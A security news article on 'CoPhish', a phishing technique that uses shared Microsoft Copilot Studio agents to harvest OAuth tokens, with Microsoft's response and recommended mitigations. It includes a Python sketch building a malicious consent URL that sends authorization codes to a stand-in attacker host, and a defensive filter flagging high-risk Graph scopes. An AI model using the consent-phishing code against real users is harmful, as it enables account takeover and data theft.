Microsoft Copilot Studio Agents Exploited in New OAuth Token Phishing Scheme

Key Points

  • CoPhish is a new phishing technique that uses Microsoft Copilot Studio agents to steal OAuth tokens.
  • Attackers embed fake login or consent flows in shared agents, prompting users to grant access.
  • Compromised tokens give attackers access to email, chat, calendar, files, and automation functions.
  • The malicious UI appears on the legitimate Microsoft domain copilotstudio.microsoft.com, increasing credibility.
  • Microsoft acknowledges the issue and plans product updates to harden consent experiences.
  • Recommended mitigations include restricting third‑party app consent, enforcing MFA, and monitoring token activity.
  • Organizations should block or review shared Copilot Studio agents and revoke suspicious tokens promptly.

Experts warn Microsoft Copilot Studio agents are being hijacked to steal OAuth tokens

Overview

Datadog Security Labs has uncovered a novel phishing technique dubbed CoPhish that leverages Microsoft Copilot Studio agents (specifically their customizable conversation components, known as "Topics") to harvest OAuth tokens from unsuspecting users. The method exploits the legitimate Microsoft domain copilotstudio.microsoft.com, making the malicious consent prompts appear authentic and increasing the likelihood that victims will comply.

How the Attack Works

Attackers create or share a Copilot Studio agent whose conversation flow includes a user‑interface element labeled "Login" or "Consent." When a victim clicks the button, a Microsoft Entra ID OAuth consent flow is launched for an attacker‑registered application. If the victim approves the request, the resulting OAuth tokens are delivered to attacker‑controlled infrastructure. These tokens grant the attacker access to a wide range of services within the victim's tenant, including email, chat, calendar, files, and automation capabilities.
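To make the flow concrete, the sketch below builds the kind of Microsoft Entra authorization URL such a malicious "Login" button could open. The client ID and redirect host are placeholders invented for illustration; the endpoint, query parameters, and Graph permission scopes shown are standard OAuth 2.0 / Microsoft Graph values, but this is an assumed reconstruction, not the exact payload described in the report.

```python
from urllib.parse import urlencode

# Placeholder values for illustration only -- not real attacker infrastructure.
TENANT = "common"
CLIENT_ID = "00000000-0000-0000-0000-000000000000"   # attacker-registered app (hypothetical)
REDIRECT_URI = "https://attacker.example/callback"   # attacker-controlled endpoint (hypothetical)

def build_consent_url(scopes):
    """Build a Microsoft Entra authorization URL of the kind a malicious
    agent button could open. If the victim approves, the authorization
    code (exchangeable for tokens) is sent to the attacker's redirect_uri."""
    params = {
        "client_id": CLIENT_ID,
        "response_type": "code",
        "redirect_uri": REDIRECT_URI,
        "scope": " ".join(scopes),
        "state": "copilot-session",
    }
    return (f"https://login.microsoftonline.com/{TENANT}"
            f"/oauth2/v2.0/authorize?{urlencode(params)}")

# Broad Graph scopes matching the access described above: mail, chat, files.
url = build_consent_url(["Mail.Read", "Chat.Read", "Files.Read.All", "offline_access"])
print(url)
```

Because the prompt is rendered from the trusted copilotstudio.microsoft.com domain, nothing in the visible URL bar warns the victim that the consent target is attacker‑controlled.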

Potential Impact

Because the tokens provide direct access to core Microsoft 365 services, the compromise can lead to extensive data exposure. Attackers can read and send emails, view and modify calendar events, access files stored in OneDrive or SharePoint, and even execute automated actions on behalf of the compromised account. The use of a trusted Microsoft domain reduces user suspicion, making the technique especially dangerous.

Microsoft’s Response

Microsoft has confirmed awareness of the technique and described it as a social‑engineering vector. A spokesperson stated, “We’ve investigated this report and are taking action to address it through future product updates.” The company indicated it is working to harden governance and consent experiences and is evaluating additional safeguards to prevent misuse of Copilot Studio agents.

Mitigation Strategies

Security experts recommend several immediate steps to reduce risk:

  • Restrict third‑party app consent so that admin approval is required for all external applications.
  • Enforce conditional access policies and multi‑factor authentication for all users.
  • Block or closely review any shared or published Copilot Studio agents before they are allowed to run in the environment.
  • Monitor for unusual app registrations and OAuth token grants, and investigate any anomalies promptly.
  • Revoke suspicious tokens and remove any unauthorized applications from the tenant.
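The monitoring step above can be sketched as a simple filter over consent‑grant audit events. The record shape and field names here are simplified assumptions (real Entra ID audit logs are more verbose), but the logic, flagging non‑admin consents to unrecognized apps that request high‑risk Graph scopes, illustrates the kind of detection rule experts recommend.

```python
# Sample records shaped loosely like Entra ID "Consent to application"
# audit events. Field names are simplified for illustration.
SAMPLE_EVENTS = [
    {"activity": "Consent to application", "app": "Contoso HR Portal",
     "scopes": ["User.Read"], "admin_consent": True},
    {"activity": "Consent to application", "app": "Unknown Agent App",
     "scopes": ["Mail.Read", "Files.Read.All", "offline_access"],
     "admin_consent": False},
]

# Scopes that would let a stolen token read mail, send mail, pull files,
# or refresh itself indefinitely.
HIGH_RISK_SCOPES = {"Mail.Read", "Mail.Send", "Files.Read.All", "offline_access"}

def flag_suspicious_consents(events, allowlist):
    """Return (app, risky_scopes) pairs for consent events where an app
    outside the allowlist obtained high-risk scopes without admin approval."""
    flagged = []
    for e in events:
        if e["activity"] != "Consent to application":
            continue
        risky = HIGH_RISK_SCOPES.intersection(e["scopes"])
        if e["app"] not in allowlist and risky and not e["admin_consent"]:
            flagged.append((e["app"], sorted(risky)))
    return flagged

alerts = flag_suspicious_consents(SAMPLE_EVENTS, allowlist={"Contoso HR Portal"})
print(alerts)
```

In practice the same rule would run against exported Entra ID audit logs or a SIEM feed, with revocation (e.g., invalidating the user's sessions and removing the offending app registration) as the follow‑up action.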

Implementing these controls can help organizations mitigate the threat while Microsoft works on longer‑term product enhancements.

Source: techradar.com